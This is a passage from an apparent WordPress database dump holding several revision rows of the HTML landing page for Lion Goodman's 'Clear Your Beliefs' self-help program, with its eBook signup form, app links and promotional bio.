make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:04:08', '2014-09-21 21:04:08', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1441, 4194, '2014-09-21 16:05:16', '2014-09-21 21:05:16', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>&nbsp;</p>\r\n<h3>How and Why It Works</h3>\r\n<p>&nbsp;</p>\r\n\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:05:16', '2014-09-21 21:05:16', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1442, 4194, '2014-09-21 16:06:16', '2014-09-21 21:06:16', '<div id="main">\r\n<div id="logo"><img src="images/logo.png" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>&nbsp;</p>\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:06:16', '2014-09-21 21:06:16', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1444, 4194, '2014-09-21 16:10:06', '2014-09-21 21:10:06', '<div id="main">\r\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>&nbsp;</p>\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a>Click HERE to Learn More</a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:10:06', '2014-09-21 21:10:06', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1443, 4194, '2014-09-21 16:08:20', '2014-09-21 21:08:20', '<div id="main">\r\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD YOUR FREE</h2>\r\neBOOK\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="0" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img src="images/mindmaster.png" alt="" width="86px" height="86px" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>&nbsp;</p>\r\n<h3>How and Why It Works</h3>\r\n\r\n<ul>\r\n	<li>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they live</li>\r\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\r\n	<li>You take charge and decide what you want to believe</li>\r\n	<li>You’re guided gently, step-by-step, through the entire process</li>\r\n	<li>You decide how far to go, and what changes to make</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<img class="aligncenter size-medium wp-image-1433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />\r\n<div>\r\n\r\nI’m Lion Goodman, creator of the Clear Your Beliefs program. I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nI am the co-author of “Creating On Purpose: The Spiritual Technology of Manifestation” (with Anodea Judith, Ph.D.). I’ve written two eBooks, Clear Your Beliefs and Menlightenment: A Book for Awakening Men.\r\n\r\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs. Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself. The only question is, “What’s the best way to change my beliefs?” This is it. I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\r\n\r\nJoin me in exploring your own subconscious mind. Read the eBook, and download the free app. Then come back and purchase the Clear Your Beliefs program. I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet. You’ll feel better, function better, and resistance and blocks will melt away – like magic. And did I mention that it’s fun?\r\n\r\nI look forward to hearing your feedback. I’m always available for consultations and support of your journey.\r\n\r\nWarmly,\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="" />\r\n\r\n</div>\r\n</div>\r\n<div style="clear: both;"></div>\r\n<div class="bott_heading">\r\n<h3>Are you a Coach? Therapist? Healer? Change Agent?</h3>\r\nBring the Clear Your Beliefs process into your practice. Help your clients clear their beliefs so they can move their lives forward.\r\n\r\n</div>\r\n<div id="bottom_buttons">\r\n<div class="bott_button"><a><img src="images/bott_button.png" alt="" width="250px" height="66px" /></a></div>\r\n</div>\r\n</div>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 16:08:20', '2014-09-21 21:08:20', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1445, 4194, '2014-09-27 10:48:21', '2014-09-27 15:48:21', '', 'logo-globe', '', 'inherit', 'closed', 'open', '', 'logo-globe', '', '', '2014-09-27 10:48:21', '2014-09-27 15:48:21', '', 1421, 'http://clearyourbeliefs.com/wp-content/uploads/2014/09/logo-globe.jpg', 0, 'attachment', 'image/jpeg', 0),
(1446, 4194, '2014-09-27 11:13:09', '2014-09-27 16:13:09', '<div id="main">\r\n<div id="logo"><img src="http://beliefcloset.com/cyb/wp-content/themes/clearyourbeliefs/images/cyb-header.jpg" alt="" width="650px" height="141px" /></div>\r\n<div id="banner"><img style="margin: 0px; cursor: pointer;" src="images/banner-new.jpg" alt="" width="562px" height="292px" /></div>\r\n<div id="three_steps">\r\n<div class="step1">\r\n<div class="stepinner">\r\n<h1>Clear Your Beliefs eBOOK</h1>\r\n<h2>DOWNLOAD THE FREE</h2>\r\n<h2>eBOOK</h2>\r\n<img class="aligncenter size-medium wp-image-433" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="1" height="1" />\r\n<div id="step1_button">\r\n<div id="mc_embed_signup" style="width: 240px; margin-left: 9px;"><form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n<table border="1" cellspacing="3" cellpadding="2">\r\n<tbody>\r\n<tr>\r\n<td class="frmtext"><b>First Name</b></td>\r\n<td><input id="mce-FNAME" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="FNAME" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<b>Email</b>\r\n\r\n<input id="mce-EMAIL" class="required email" style="padding: .2em .3em; z-index: 999; border: solid #8C1014 2px;" name="EMAIL" type="text" />\r\n\r\n</div>\r\n<input style="padding-top: 10px;" name="Submit" src="images/get_access.png" type="image" value="Submit" />\r\n\r\n</form></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step2">\r\n<div class="stepinner">\r\n<h1>iClearIt APP</h1>\r\n<div id="mindmaster_img"><img class="aligncenter  wp-image-1445" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/logo-globe.jpg" alt="logo-globe" width="123" height="132" /></div>\r\n<h2>DOWNLOAD THE</h2>\r\niClearIt APP\r\n<div id="button">\r\n<div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" alt="" width="224px" height="52px" /></a></div>\r\n<div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png" alt="" width="224px" height="52px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class="step3">\r\n<div class="stepinner">\r\n<h1>CLEAR YOUR BELIEFS</h1>\r\n<div id="step3_img"><img src="images/step3_img.png" alt="" width="201px" height="161px" /></div>\r\n<h2>Choose a Goal &amp;</h2>\r\nMaster Your Chosen Life\r\n<div class="step3_buttons"><a><img src="images/step3_button.png" alt="" width="204px" height="62px" /></a></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id="textarea">\r\n<div id="leftside">\r\n<div id="lefttext">\r\n<h3>What You Can Accomplish\r\nwith\r\nClear Your Beliefs</h3>\r\n<ul>\r\n	<li>Release hurt and pain from the past</li>\r\n	<li>Clear resistance to taking action</li>\r\n	<li>Open to new possibilities</li>\r\n	<li>Eliminate blocks to manifestation</li>\r\n	<li>Find your true purpose</li>\r\n	<li>Delete what’s been holding you back</li>\r\n	<li>Change your personality style</li>\r\n	<li>Open to deeper, more profound love</li>\r\n	<li>Recognize your spiritual nature</li>\r\n	<li>Become less reactive, more calm</li>\r\n	<li>Rediscover the source of your personal power</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div 